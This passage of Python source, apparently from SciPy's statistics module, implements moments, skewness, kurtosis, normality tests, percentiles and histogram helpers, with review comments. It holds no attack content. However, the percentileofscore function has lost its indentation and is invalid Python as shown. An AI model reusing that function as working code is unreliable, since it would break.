    higher orders use exponentiation by squaring on the de-meaned data.
    """
    # Only integer orders are supported.
    if np.abs(moment - np.round(moment)) > 0:
        raise ValueError("All moment parameters must be integers")

    if moment == 0:
        # The 0th moment is 1 by definition; match the input's reduced shape.
        out_shape = list(a.shape)
        del out_shape[axis]
        if out_shape:
            return np.ones(out_shape, dtype=float)
        # 1-D input: return a plain scalar rather than a rank-0 array.
        return 1.0

    if moment == 1:
        # The first moment about the mean is 0 by definition.
        out_shape = list(a.shape)
        del out_shape[axis]
        if out_shape:
            return np.zeros(out_shape, dtype=float)
        # 1-D input: return a scalar rather than a rank-0 array.
        return np.float64(0.0)

    # Build the chain of exponents for exponentiation by squaring:
    # repeatedly halve (rounding odd values down) until reaching 1 or 2.
    exponents = [moment]
    k = moment
    while k > 2:
        k = (k - 1) / 2 if k % 2 else k / 2
        exponents.append(k)

    # De-mean along the requested axis (mean is broadcast back in).
    centered = a - np.expand_dims(np.mean(a, axis), axis)

    # Seed with the smallest exponent in the chain (1 or 2) ...
    s = centered.copy() if exponents[-1] == 1 else centered**2
    # ... then square up the chain, multiplying in one extra factor of the
    # de-meaned data whenever the target exponent at that step is odd.
    for e in exponents[-2::-1]:
        s = s**2
        if e % 2:
            s *= centered
    return np.mean(s, axis)
def variation(a, axis=0, nan_policy='propagate'):
    """
    Computes the coefficient of variation, the ratio of the biased standard
    deviation to the mean.

    Parameters
    ----------
    a : array_like
        Input array.
    axis : int or None, optional
        Axis along which to calculate the coefficient of variation. Default
        is 0. If None, compute over the whole array `a`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    variation : ndarray
        The calculated variation along the requested axis.

    References
    ----------
    .. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
       Probability and Statistics Tables and Formulae. Chapman & Hall: New
       York. 2000.

    """
    a, axis = _chk_asarray(a, axis)

    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan:
        # 'raise' has already raised inside _contains_nan, so only the
        # 'omit' and 'propagate' policies can reach this point.
        if nan_policy == 'omit':
            return mstats_basic.variation(ma.masked_invalid(a), axis)
        if nan_policy == 'propagate':
            return np.nan

    return a.std(axis) / a.mean(axis)
def skew(a, axis=0, bias=True, nan_policy='propagate'):
    """
    Computes the skewness of a data set.

    For normally distributed data, the skewness should be about 0. A skewness
    value > 0 means that there is more weight in the right tail of the
    distribution. The function `skewtest` can be used to determine if the
    skewness value is close enough to 0, statistically speaking.

    Parameters
    ----------
    a : ndarray
        data
    axis : int or None, optional
        Axis along which skewness is calculated. Default is 0.
        If None, compute over the whole array `a`.
    bias : bool, optional
        If False, then the calculations are corrected for statistical bias.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    skewness : ndarray
        The skewness of values along an axis, returning 0 where all values are
        equal.

    References
    ----------
    .. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
       Probability and Statistics Tables and Formulae. Chapman & Hall: New
       York. 2000.
       Section 2.2.24.1

    """
    a, axis = _chk_asarray(a, axis)
    n = a.shape[axis]
    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan and nan_policy == 'omit':
        # Delegate NaN-aware computation to the masked-array implementation.
        a = ma.masked_invalid(a)
        return mstats_basic.skew(a, axis, bias)
    if contains_nan and nan_policy == 'propagate':
        return np.nan
    m2 = moment(a, 2, axis)
    m3 = moment(a, 3, axis)
    # g1 = m3 / m2**1.5; where the variance m2 is zero (all values equal)
    # skewness is defined to be 0, avoiding a 0/0 division.
    zero = (m2 == 0)
    vals = _lazywhere(~zero, (m2, m3),
                      lambda m2, m3: m3 / m2**1.5,
                      0.)
    if not bias:
        # The bias correction factor sqrt(n(n-1))/(n-2) is only defined for
        # n > 2 and a strictly positive variance.
        can_correct = (n > 2) & (m2 > 0)
        if can_correct.any():
            m2 = np.extract(can_correct, m2)
            m3 = np.extract(can_correct, m3)
            nval = np.sqrt((n-1.0)*n) / (n-2.0) * m3/m2**1.5
            np.place(vals, can_correct, nval)
    if vals.ndim == 0:
        # Input reduced to a single value: return a scalar, not a 0-d array.
        return vals.item()
    return vals
def kurtosis(a, axis=0, fisher=True, bias=True, nan_policy='propagate'):
    """
    Computes the kurtosis (Fisher or Pearson) of a dataset.

    Kurtosis is the fourth central moment divided by the square of the
    variance. If Fisher's definition is used, then 3.0 is subtracted from
    the result to give 0.0 for a normal distribution.

    If bias is False then the kurtosis is calculated using k statistics to
    eliminate bias coming from biased moment estimators

    Use `kurtosistest` to see if result is close enough to normal.

    Parameters
    ----------
    a : array
        data for which the kurtosis is calculated
    axis : int or None, optional
        Axis along which the kurtosis is calculated. Default is 0.
        If None, compute over the whole array `a`.
    fisher : bool, optional
        If True, Fisher's definition is used (normal ==> 0.0). If False,
        Pearson's definition is used (normal ==> 3.0).
    bias : bool, optional
        If False, then the calculations are corrected for statistical bias.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    kurtosis : array
        The kurtosis of values along an axis. If all values are equal,
        return -3 for Fisher's definition and 0 for Pearson's definition.

    References
    ----------
    .. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
       Probability and Statistics Tables and Formulae. Chapman & Hall: New
       York. 2000.

    """
    a, axis = _chk_asarray(a, axis)
    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan and nan_policy == 'omit':
        # Delegate NaN-aware computation to the masked-array implementation.
        a = ma.masked_invalid(a)
        return mstats_basic.kurtosis(a, axis, fisher, bias)
    if contains_nan and nan_policy == 'propagate':
        return np.nan
    n = a.shape[axis]
    m2 = moment(a, 2, axis)
    m4 = moment(a, 4, axis)
    zero = (m2 == 0)
    # Silence the divide-by-zero warning for entries with m2 == 0; those
    # entries are overwritten with 0 by the np.where below.
    olderr = np.seterr(all='ignore')
    try:
        vals = np.where(zero, 0, m4 / m2**2.0)
    finally:
        np.seterr(**olderr)
    if not bias:
        # The k-statistics correction is only defined for n > 3 and a
        # strictly positive variance.
        can_correct = (n > 3) & (m2 > 0)
        if can_correct.any():
            m2 = np.extract(can_correct, m2)
            m4 = np.extract(can_correct, m4)
            nval = 1.0/(n-2)/(n-3) * ((n**2-1.0)*m4/m2**2.0 - 3*(n-1)**2.0)
            # nval is the Fisher (excess) form; add 3 back because `vals`
            # holds the Pearson form until the final fisher adjustment.
            np.place(vals, can_correct, nval + 3.0)
    if vals.ndim == 0:
        vals = vals.item()  # array scalar
    if fisher:
        return vals - 3
    else:
        return vals
def describe(a, axis=0, ddof=1, bias=True, nan_policy='propagate'):
    """
    Computes several descriptive statistics of the passed array.

    Parameters
    ----------
    a : array_like
        Input data.
    axis : int or None, optional
        Axis along which statistics are calculated. Default is 0.
        If None, compute over the whole array `a`.
    ddof : int, optional
        Delta degrees of freedom (only for variance). Default is 1.
    bias : bool, optional
        If False, then the skewness and kurtosis calculations are corrected
        for statistical bias.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    nobs : int
        Number of observations (length of data along `axis`).
    minmax: tuple of ndarrays or floats
        Minimum and maximum value of data array.
    mean : ndarray or float
        Arithmetic mean of data along axis.
    variance : ndarray or float
        Unbiased variance of the data along axis, denominator is number of
        observations minus one.
    skewness : ndarray or float
        Skewness, based on moment calculations with denominator equal to
        the number of observations, i.e. no degrees of freedom correction.
    kurtosis : ndarray or float
        Kurtosis (Fisher). The kurtosis is normalized so that it is
        zero for the normal distribution. No degrees of freedom are used.

    See Also
    --------
    skew, kurtosis

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.arange(10)
    >>> stats.describe(a)
    DescribeResult(nobs=10, minmax=(0, 9), mean=4.5, variance=9.1666666666666661,
                   skewness=0.0, kurtosis=-1.2242424242424244)

    """
    a, axis = _chk_asarray(a, axis)

    # Results are packed into a namedtuple for readability.
    DescribeResult = namedtuple('DescribeResult', ('nobs', 'minmax', 'mean',
                                                   'variance', 'skewness',
                                                   'kurtosis'))

    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan:
        if nan_policy == 'omit':
            return mstats_basic.describe(ma.masked_invalid(a), axis, ddof,
                                         bias)
        if nan_policy == 'propagate':
            # All six fields propagate as nan.
            return DescribeResult(*(np.zeros(6) * np.nan))

    if a.size == 0:
        raise ValueError("The input must not be empty.")

    nobs = a.shape[axis]
    extremes = (np.min(a, axis=axis), np.max(a, axis=axis))
    return DescribeResult(nobs, extremes,
                          np.mean(a, axis=axis),
                          np.var(a, axis=axis, ddof=ddof),
                          skew(a, axis, bias=bias),
                          kurtosis(a, axis, bias=bias))
#####################################
# NORMALITY TESTS #
#####################################
def skewtest(a, axis=0, nan_policy='propagate'):
    """
    Tests whether the skew is different from the normal distribution.

    This function tests the null hypothesis that the skewness of
    the population that the sample was drawn from is the same
    as that of a corresponding normal distribution.

    Parameters
    ----------
    a : array
        The data to be tested
    axis : int or None, optional
        Axis along which statistics are calculated. Default is 0.
        If None, compute over the whole array `a`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    statistic : float
        The computed z-score for this test.
    pvalue : float
        a 2-sided p-value for the hypothesis test

    Notes
    -----
    The sample size must be at least 8.  The constants below appear to
    implement D'Agostino's transformation of the sample skewness to an
    approximately standard-normal Z -- TODO confirm against the original
    reference.

    """
    a, axis = _chk_asarray(a, axis)

    SkewtestResult = namedtuple('SkewtestResult', ('statistic', 'pvalue'))

    contains_nan, nan_policy = _contains_nan(a, nan_policy)

    if contains_nan and nan_policy == 'omit':
        # Delegate NaN-aware computation to the masked-array implementation.
        a = ma.masked_invalid(a)
        return mstats_basic.skewtest(a, axis)

    if contains_nan and nan_policy == 'propagate':
        return SkewtestResult(np.nan, np.nan)

    if axis is None:
        a = np.ravel(a)
        axis = 0
    b2 = skew(a, axis)
    n = float(a.shape[axis])
    if n < 8:
        raise ValueError(
            "skewtest is not valid with less than 8 samples; %i samples"
            " were given." % int(n))

    # Standardize the sample skewness, then apply a normalizing
    # transformation so Z is approximately N(0, 1) under the null.
    y = b2 * math.sqrt(((n + 1) * (n + 3)) / (6.0 * (n - 2)))
    beta2 = (3.0 * (n**2 + 27*n - 70) * (n+1) * (n+3) /
             ((n-2.0) * (n+5) * (n+7) * (n+9)))
    W2 = -1 + math.sqrt(2 * (beta2 - 1))
    delta = 1 / math.sqrt(0.5 * math.log(W2))
    alpha = math.sqrt(2.0 / (W2 - 1))
    # Avoid log(0) below: a skewness of exactly 0 is replaced by 1.
    y = np.where(y == 0, 1, y)
    # delta * asinh(y / alpha), written out via the log identity.
    Z = delta * np.log(y / alpha + np.sqrt((y / alpha)**2 + 1))

    # Two-sided p-value from the standard normal survival function.
    return SkewtestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
def kurtosistest(a, axis=0, nan_policy='propagate'):
    """
    Tests whether a dataset has normal kurtosis

    This function tests the null hypothesis that the kurtosis
    of the population from which the sample was drawn is that
    of the normal distribution: ``kurtosis = 3(n-1)/(n+1)``.

    Parameters
    ----------
    a : array
        array of the sample data
    axis : int or None, optional
        Axis along which to compute test. Default is 0. If None,
        compute over the whole array `a`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns nan,
        'raise' throws an error, 'omit' performs the calculations ignoring nan
        values. Default is 'propagate'.

    Returns
    -------
    statistic : float
        The computed z-score for this test.
    pvalue : float
        The 2-sided p-value for the hypothesis test

    Notes
    -----
    Valid only for n>20. The Z-score is set to 0 for bad entries.

    """
    a, axis = _chk_asarray(a, axis)

    KurtosistestResult = namedtuple('KurtosistestResult', ('statistic',
                                                           'pvalue'))

    contains_nan, nan_policy = _contains_nan(a, nan_policy)

    if contains_nan and nan_policy == 'omit':
        # Delegate NaN-aware computation to the masked-array implementation.
        a = ma.masked_invalid(a)
        return mstats_basic.kurtosistest(a, axis)

    if contains_nan and nan_policy == 'propagate':
        return KurtosistestResult(np.nan, np.nan)

    n = float(a.shape[axis])
    if n < 5:
        raise ValueError(
            "kurtosistest requires at least 5 observations; %i observations"
            " were given." % int(n))
    if n < 20:
        warnings.warn("kurtosistest only valid for n>=20 ... continuing "
                      "anyway, n=%i" % int(n))
    # Pearson kurtosis (normal ==> 3.0), compared to its null expectation E.
    b2 = kurtosis(a, axis, fisher=False)
    E = 3.0*(n-1) / (n+1)
    varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1.)*(n+3)*(n+5))
    # Standardized kurtosis, then a cube-root normalizing transformation.
    x = (b2-E) / np.sqrt(varb2)
    sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * np.sqrt((6.0*(n+3)*(n+5)) /
                                                        (n*(n-2)*(n-3)))
    A = 6.0 + 8.0/sqrtbeta1 * (2.0/sqrtbeta1 + np.sqrt(1+4.0/(sqrtbeta1**2)))
    term1 = 1 - 2/(9.0*A)
    denom = 1 + x*np.sqrt(2/(A-4.0))
    # A negative denom would make the cube root below complex; such "bad"
    # entries are flagged with the sentinel value 99 and their Z-score is
    # forced to 0 further down.
    denom = np.where(denom < 0, 99, denom)
    # NOTE(review): after the sentinel substitution above, `denom < 0` can
    # never be true here, so the `term1` branch is dead code; the result is
    # still correct because Z is zeroed where denom == 99 below.
    term2 = np.where(denom < 0, term1, np.power((1-2.0/A)/denom, 1/3.0))
    Z = (term1 - term2) / np.sqrt(2/(9.0*A))
    Z = np.where(denom == 99, 0, Z)
    if Z.ndim == 0:
        Z = Z[()]

    # zprob uses upper tail, so Z needs to be positive
    return KurtosistestResult(Z, 2 * distributions.norm.sf(np.abs(Z)))
def normaltest(a, axis=0, nan_policy='propagate'):
    """
    Tests whether a sample differs from a normal distribution.

    This function tests the null hypothesis that a sample comes
    from a normal distribution. It is based on D'Agostino and
    Pearson's [1]_, [2]_ test that combines skew and kurtosis to
    produce an omnibus test of normality.

    Parameters
    ----------
    a : array_like
        The array containing the data to be tested.
    axis : int or None, optional
        Axis along which to compute test. Default is 0. If None,
        compute over the whole array `a`.
    nan_policy : {'propagate', 'raise', 'omit'}, optional
        Defines how to handle when input contains nan. 'propagate' returns
        nan, 'raise' throws an error, 'omit' performs the calculations
        ignoring nan values. Default is 'propagate'.

    Returns
    -------
    statistic : float or array
        ``s^2 + k^2``, where ``s`` is the z-score returned by `skewtest` and
        ``k`` is the z-score returned by `kurtosistest`.
    pvalue : float or array
        A 2-sided chi squared probability for the hypothesis test.

    References
    ----------
    .. [1] D'Agostino, R. B. (1971), "An omnibus test of normality for
           moderate and large sample size," Biometrika, 58, 341-348
    .. [2] D'Agostino, R. and Pearson, E. S. (1973), "Testing for
           departures from normality," Biometrika, 60, 613-622

    """
    a, axis = _chk_asarray(a, axis)

    NormaltestResult = namedtuple('NormaltestResult', ('statistic', 'pvalue'))

    contains_nan, nan_policy = _contains_nan(a, nan_policy)
    if contains_nan:
        if nan_policy == 'omit':
            return mstats_basic.normaltest(ma.masked_invalid(a), axis)
        if nan_policy == 'propagate':
            return NormaltestResult(np.nan, np.nan)

    # Combine the two component z-scores into the omnibus statistic,
    # which is chi-squared with 2 degrees of freedom under the null.
    s, _ = skewtest(a, axis)
    k, _ = kurtosistest(a, axis)
    statistic = s*s + k*k
    return NormaltestResult(statistic, distributions.chi2.sf(statistic, 2))
def jarque_bera(x):
    """
    Perform the Jarque-Bera goodness of fit test on sample data.

    The Jarque-Bera test tests whether the sample data has the skewness and
    kurtosis matching a normal distribution.

    Note that this test only works for a large enough number of data samples
    (>2000) as the test statistic asymptotically has a Chi-squared distribution
    with 2 degrees of freedom.

    Parameters
    ----------
    x : array_like
        Observations of a random variable.

    Returns
    -------
    jb_value : float
        The test statistic.
    p : float
        The p-value for the hypothesis test.

    Raises
    ------
    ValueError
        If `x` is empty.

    References
    ----------
    .. [1] Jarque, C. and Bera, A. (1980) "Efficient tests for normality,
           homoscedasticity and serial independence of regression residuals",
           6 Econometric Letters 255-259.

    Examples
    --------
    >>> from scipy import stats
    >>> np.random.seed(987654321)
    >>> x = np.random.normal(0, 1, 100000)
    >>> y = np.random.rayleigh(1, 100000)
    >>> stats.jarque_bera(x)
    (4.7165707989581342, 0.09458225503041906)
    >>> stats.jarque_bera(y)
    (6713.7098548143422, 0.0)

    """
    x = np.asarray(x)
    n = float(x.size)
    if n == 0:
        raise ValueError('At least one observation is required.')

    mu = x.mean()
    diffx = x - mu
    # Biased (1/n) sample skewness and Pearson kurtosis.
    skewness = (1 / n * np.sum(diffx**3)) / (1 / n * np.sum(diffx**2))**(3 / 2.)
    kurtosis = (1 / n * np.sum(diffx**4)) / (1 / n * np.sum(diffx**2))**2
    jb_value = n / 6 * (skewness**2 + (kurtosis - 3)**2 / 4)
    # Use the survival function instead of ``1 - cdf``: sf keeps precision
    # for large statistics where cdf rounds to 1.0 and the p-value would
    # lose all significant digits. Also consistent with `normaltest`.
    p = distributions.chi2.sf(jb_value, 2)

    return jb_value, p
#####################################
# FREQUENCY FUNCTIONS #
#####################################
def itemfreq(a):
    """
    Returns a 2-D array of item frequencies.

    Parameters
    ----------
    a : (N,) array_like
        Input array.

    Returns
    -------
    itemfreq : (K, 2) ndarray
        A 2-D frequency table. Column 1 contains sorted, unique values from
        `a`, column 2 contains their respective counts.

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.array([1, 1, 5, 0, 1, 2, 2, 0, 1, 4])
    >>> freqs = stats.itemfreq(a)
    >>> freqs[:, 0]   # the distinct values, sorted
    array([0, 1, 2, 4, 5])
    >>> freqs[:, 1]   # how often each value occurs
    array([2, 4, 2, 1, 1])

    """
    # np.unique returns the sorted distinct values plus, for every element
    # of `a`, the index of its value in that sorted list; counting those
    # indices with bincount yields the per-value frequencies.
    values, inverse = np.unique(a, return_inverse=True)
    counts = np.bincount(inverse)
    return np.column_stack((values, counts))
def scoreatpercentile(a, per, limit=(), interpolation_method='fraction',
                      axis=None):
    """
    Calculate the score at a given percentile of the input sequence.

    For example, the score at `per=50` is the median. If the desired quantile
    lies between two data points, we interpolate between them, according to
    the value of `interpolation`. If the parameter `limit` is provided, it
    should be a tuple (lower, upper) of two values.

    Parameters
    ----------
    a : array_like
        A 1-D array of values from which to extract score.
    per : array_like
        Percentile(s) at which to extract score. Values should be in range
        [0,100].
    limit : tuple, optional
        Tuple of two scalars, the lower and upper limits within which to
        compute the percentile. Values of `a` outside
        this (closed) interval will be ignored.
    interpolation_method : {'fraction', 'lower', 'higher'}, optional
        This optional parameter specifies the interpolation method to use,
        when the desired quantile lies between two data points `i` and `j`

          - fraction: ``i + (j - i) * fraction`` where ``fraction`` is the
            fractional part of the index surrounded by ``i`` and ``j``.
          - lower: ``i``.
          - higher: ``j``.

    axis : int, optional
        Axis along which the percentiles are computed. Default is None. If
        None, compute over the whole array `a`.

    Returns
    -------
    score : float or ndarray
        Score at percentile(s).

    See Also
    --------
    percentileofscore, numpy.percentile

    Notes
    -----
    This function will become obsolete in the future.
    For Numpy 1.9 and higher, `numpy.percentile` provides all the functionality
    that `scoreatpercentile` provides.  And it's significantly faster.
    Therefore it's recommended to use `numpy.percentile` for users that have
    numpy >= 1.9.

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.arange(100)
    >>> stats.scoreatpercentile(a, 50)
    49.5

    """
    # adapted from NumPy's percentile function.  When we require numpy >= 1.8,
    # the implementation of this function can be replaced by np.percentile.
    a = np.asarray(a)

    if a.size == 0:
        # empty input: produce nan(s) whose shape matches `per`
        if np.isscalar(per):
            return np.nan
        return np.ones(np.asarray(per).shape, dtype=np.float64) * np.nan

    if limit:
        # keep only the values inside the closed interval [lower, upper]
        lower, upper = limit
        a = a[(lower <= a) & (a <= upper)]

    ordered = np.sort(a, axis=axis)
    if axis is None:
        axis = 0

    return _compute_qth_percentile(ordered, per, interpolation_method, axis)
# handle sequence of per's without calling sort multiple times
def _compute_qth_percentile(sorted, per, interpolation_method, axis):
    """Compute the `per`-th percentile of already-sorted data along `axis`.

    Helper for `scoreatpercentile`.  `sorted` must be sorted along `axis`;
    `per` may be a scalar in [0, 100] or a sequence thereof (handled
    recursively so the data is only sorted once by the caller).
    """
    if not np.isscalar(per):
        # sequence of percentiles: recurse once per requested value
        score = [_compute_qth_percentile(sorted, i, interpolation_method, axis)
                 for i in per]
        return np.array(score)

    if (per < 0) or (per > 100):
        raise ValueError("percentile must be in the range [0, 100]")

    indexer = [slice(None)] * sorted.ndim
    idx = per / 100. * (sorted.shape[axis] - 1)

    if int(idx) != idx:
        # round fractional indices according to interpolation method
        if interpolation_method == 'lower':
            idx = int(np.floor(idx))
        elif interpolation_method == 'higher':
            idx = int(np.ceil(idx))
        elif interpolation_method == 'fraction':
            pass  # keep idx as fraction and interpolate
        else:
            raise ValueError("interpolation_method can only be 'fraction', "
                             "'lower' or 'higher'")

    i = int(idx)
    if i == idx:
        # exact order statistic: unit weight on a single element
        indexer[axis] = slice(i, i + 1)
        weights = np.array(1)
        sumval = 1.0
    else:
        # interpolate linearly between the two bracketing order statistics
        indexer[axis] = slice(i, i + 2)
        j = i + 1
        weights = np.array([(j - idx), (idx - i)], float)
        wshape = [1] * sorted.ndim
        wshape[axis] = 2
        weights.shape = wshape
        sumval = weights.sum()

    # Index with a tuple: indexing an ndarray with a *list* of slices was
    # deprecated in NumPy 1.15 and removed in NumPy >= 1.23.
    # Use np.add.reduce (== np.sum but a little faster) to coerce data type
    return np.add.reduce(sorted[tuple(indexer)] * weights, axis=axis) / sumval
def percentileofscore(a, score, kind='rank'):
"""
The percentile rank of a score relative to a list of scores.
A `percentileofscore` of, for example, 80% means that 80% of the
scores in `a` are below the given score. In the case of gaps or
ties, the exact definition depends on the optional keyword, `kind`.
Parameters
----------
a : array_like
Array of scores to which `score` is compared.
score : int or float
Score that is compared to the elements in `a`.
kind : {'rank', 'weak', 'strict', 'mean'}, optional
This optional parameter specifies the interpretation of the
resulting score:
- "rank": Average percentage ranking of score. In case of
multiple matches, average the percentage rankings of
all matching scores.
- "weak": This kind corresponds to the definition of a cumulative
distribution function. A percentileofscore of 80%
means that 80% of values are less than or equal
to the provided score.
- "strict": Similar to "weak", except that only values that are
strictly less than the given score are counted.
- "mean": The average of the "weak" and "strict" scores, often used in
testing. See
http://en.wikipedia.org/wiki/Percentile_rank
Returns
-------
pcos : float
Percentile-position of score (0-100) relative to `a`.
See Also
--------
numpy.percentile
Examples
--------
Three-quarters of the given values lie below a given score:
>>> from scipy import stats
>>> stats.percentileofscore([1, 2, 3, 4], 3)
75.0
With multiple matches, note how the scores of the two matches, 0.6
and 0.8 respectively, are averaged:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3)
70.0
Only 2/5 values are strictly less than 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='strict')
40.0
But 4/5 values are less than or equal to 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='weak')
80.0
The average between the weak and the strict scores is
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='mean')
60.0
"""
a = np.array(a)
n = len(a)
if kind == 'rank':
if not np.any(a == score):
a = np.append(a, score)
a_len = np.array(list(range(len(a))))
else:
a_len = np.array(list(range(len(a)))) + 1.0
a = np.sort(a)
idx = [a == score]
pct = (np.mean(a_len[idx]) / n) * 100.0
return pct
elif kind == 'strict':
return np.sum(a < score) / float(n) * 100
elif kind == 'weak':
return np.sum(a <= score) / float(n) * 100
elif kind == 'mean':
return (np.sum(a < score) + np.sum(a <= score)) * 50 / float(n)
else:
raise ValueError("kind can only be 'rank', 'strict', 'weak' or 'mean'")
@np.deprecate(message=("scipy.stats.histogram2 is deprecated in scipy 0.16.0; "
                       "use np.histogram2d instead"))
def histogram2(a, bins):
    """
    Compute histogram using divisions in bins.

    Count the number of times values from array `a` fall into
    numerical ranges defined by `bins`.  Range x is given by
    bins[x] <= range_x < bins[x+1] where x =0,N and N is the
    length of the `bins` array.  The last range is given by
    bins[N] <= range_N < infinity.  Values less than bins[0] are
    not included in the histogram.

    Parameters
    ----------
    a : array_like of rank 1
        The array of values to be assigned into bins
    bins : array_like of rank 1
        Defines the ranges of values to use during histogramming.

    Returns
    -------
    histogram2 : ndarray of rank 1
        Each value represents the occurrences for a given bin (range) of
        values.

    """
    # comment: probably obsoleted by numpy.histogram()
    # NOTE(review): `np.deprecate` (used as this function's decorator) was
    # removed in NumPy 2.0 -- confirm the supported NumPy range.
    # searchsorted gives, for each bin edge, how many sorted values fall
    # below it; appending len(a) as a sentinel captures the open-ended last
    # bin, and consecutive differences yield the per-bin counts.
    n = np.searchsorted(np.sort(a), bins)
    n = np.concatenate([n, [len(a)]])
    return n[1:] - n[:-1]
def histogram(a, numbins=10, defaultlimits=None, weights=None, printextras=False):
    """
    Separates the range into several bins and returns the number of instances
    in each bin.

    Parameters
    ----------
    a : array_like
        Array of scores which will be put into bins.
    numbins : int, optional
        The number of bins to use for the histogram. Default is 10.
    defaultlimits : tuple (lower, upper), optional
        The lower and upper values for the range of the histogram.
        If no value is given, a range slightly larger than the range of the
        values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
        where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
    weights : array_like, optional
        The weights for each value in `a`. Default is None, which gives each
        value a weight of 1.0
    printextras : bool, optional
        If True, if there are extra points (i.e. the points that fall outside
        the bin limits) a warning is raised saying how many of those points
        there are.  Default is False.

    Returns
    -------
    count : ndarray
        Number of points (or sum of weights) in each bin.
    lowerlimit : float
        Lowest value of histogram, the lower limit of the first bin.
    binsize : float
        The size of the bins (all bins have the same size).
    extrapoints : int
        The number of points outside the range of the histogram.

    See Also
    --------
    numpy.histogram

    Notes
    -----
    This histogram is based on numpy's histogram but has a larger range by
    default if default limits is not set.

    """
    a = np.ravel(a)

    if defaultlimits is None:
        if a.size == 0:
            # Empty input has no determinable range; fall back to (0, 1).
            defaultlimits = (0, 1)
        else:
            # Pad the data range so the extreme values fall strictly inside
            # the outermost bins.
            data_min, data_max = a.min(), a.max()
            pad = (data_max - data_min) / (2. * (numbins - 1.))
            defaultlimits = (data_min - pad, data_max + pad)

    # Let numpy do the actual binning.
    counts, bin_edges = np.histogram(a, bins=numbins, range=defaultlimits,
                                     weights=weights)

    # Convert to float to keep the historical output dtype.
    counts = np.array(counts, dtype=float)

    # numpy produces equal-width bins for an integer `bins`, so a single
    # width describes them all.
    binsize = bin_edges[1] - bin_edges[0]

    # Count the points falling outside the histogram range.
    outside = (a < defaultlimits[0]) | (a > defaultlimits[1])
    extrapoints = int(np.count_nonzero(outside))
    if extrapoints > 0 and printextras:
        warnings.warn("Points outside given histogram range = %s"
                      % extrapoints)

    HistogramResult = namedtuple('HistogramResult', ('count', 'lowerlimit',
                                                     'binsize', 'extrapoints'))
    return HistogramResult(counts, defaultlimits[0], binsize, extrapoints)
def cumfreq(a, numbins=10, defaultreallimits=None, weights=None):
    """
    Returns a cumulative frequency histogram, using the histogram function.

    A cumulative histogram is a mapping that counts the cumulative number of
    observations in all of the bins up to the specified bin.

    Parameters
    ----------
    a : array_like
        Input array.
    numbins : int, optional
        The number of bins to use for the histogram. Default is 10.
    defaultreallimits : tuple (lower, upper), optional
        The lower and upper values for the range of the histogram.
        If no value is given, a range slightly larger than the range of the
        values in `a` is used. Specifically ``(a.min() - s, a.max() + s)``,
        where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
    weights : array_like, optional
        The weights for each value in `a`. Default is None, which gives each
        value a weight of 1.0

    Returns
    -------
    cumcount : ndarray
        Binned values of cumulative frequency.
    lowerlimit : float
        Lower real limit
    binsize : float
        Width of each bin.
    extrapoints : int
        Extra points.

    Examples
    --------
    >>> from scipy import stats
    >>> x = [1, 4, 2, 1, 3, 1]
    >>> res = stats.cumfreq(x, numbins=4, defaultreallimits=(1.5, 5))
    >>> res.cumcount
    array([ 1.,  2.,  3.,  3.])
    >>> res.extrapoints
    3

    """
    # Bin the data once, then accumulate the per-bin counts.
    count, lowerlimit, binsize, extrapoints = histogram(
        a, numbins, defaultreallimits, weights=weights)
    cumcount = np.cumsum(count, axis=0)

    CumfreqResult = namedtuple('CumfreqResult', ('cumcount', 'lowerlimit',
                                                 'binsize', 'extrapoints'))
    return CumfreqResult(cumcount, lowerlimit, binsize, extrapoints)
def relfreq(a, numbins=10, defaultreallimits=None, weights=None):
    """
    Returns a relative frequency histogram, using the histogram function.

    A relative frequency histogram is a mapping of the number of
    observations in each of the bins relative to the total of observations.

    Parameters
    ----------
    a : array_like
        Input array.
    numbins : int, optional
        The number of bins to use for the histogram. Default is 10.
    defaultreallimits : tuple (lower, upper), optional
        The lower and upper values for the range of the histogram.
        If no value is given, a range slightly larger than the range of the
        values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
        where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
    weights : array_like, optional
        The weights for each value in `a`. Default is None, which gives each
        value a weight of 1.0

    Returns
    -------
    frequency : ndarray
        Binned values of relative frequency.
    lowerlimit : float
        Lower real limit
    binsize : float
        Width of each bin.
    extrapoints : int
        Extra points.

    Examples
    --------
    >>> from scipy import stats
    >>> a = np.array([2, 4, 1, 2, 3, 2])
